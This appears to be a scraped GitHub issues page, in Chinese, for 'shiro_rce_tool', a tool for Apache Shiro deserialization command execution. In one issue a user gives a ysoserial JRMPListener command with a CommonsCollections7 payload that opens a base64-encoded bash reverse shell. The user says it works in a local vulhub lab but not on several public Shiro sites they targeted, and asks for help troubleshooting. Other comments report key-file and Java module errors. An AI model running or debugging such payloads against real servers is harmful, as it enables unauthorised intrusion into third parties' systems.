shiro_rce_tool
shiro_rce_tool copied to clipboard
wyzxxz
shiro 反序列 命令执行辅助检测工具
请问师傅,在base64编码的情况下,我使用的命令错了吗?  另外,我主要是想用这个工具来学习下JRMP打shiro的方法。我的命令如下 `java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections7 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"` 然后 shiro_tool.jar 选择 JRMPClient 对应的数字。 填入上面跑 ysoserial-all.jar 的 ip:6789 这样在我本地vulhub搭建的环境里面,是可以弹shell回来的,但是我公网找了好几个shiro站点,就是弹不回来,可以确定不是我vps没开端口或其它的原因,dnslog也是有记录的,这会是什么原因啊?🫡
请问这是没有成功加载 keys.txt 里面的key吗?还是说 keys.txt 里面的key都不对,就让我输入key。 我加上 keys=keys.txt 也是同样的输出。
[-] check Groovy1 java.lang.reflect.InaccessibleObjectException: Unable to make protected void java.lang.Object.finalize() throws java.lang.Throwable accessible: module java.base does not "opens java.lang" to unnamed module @b104ca1
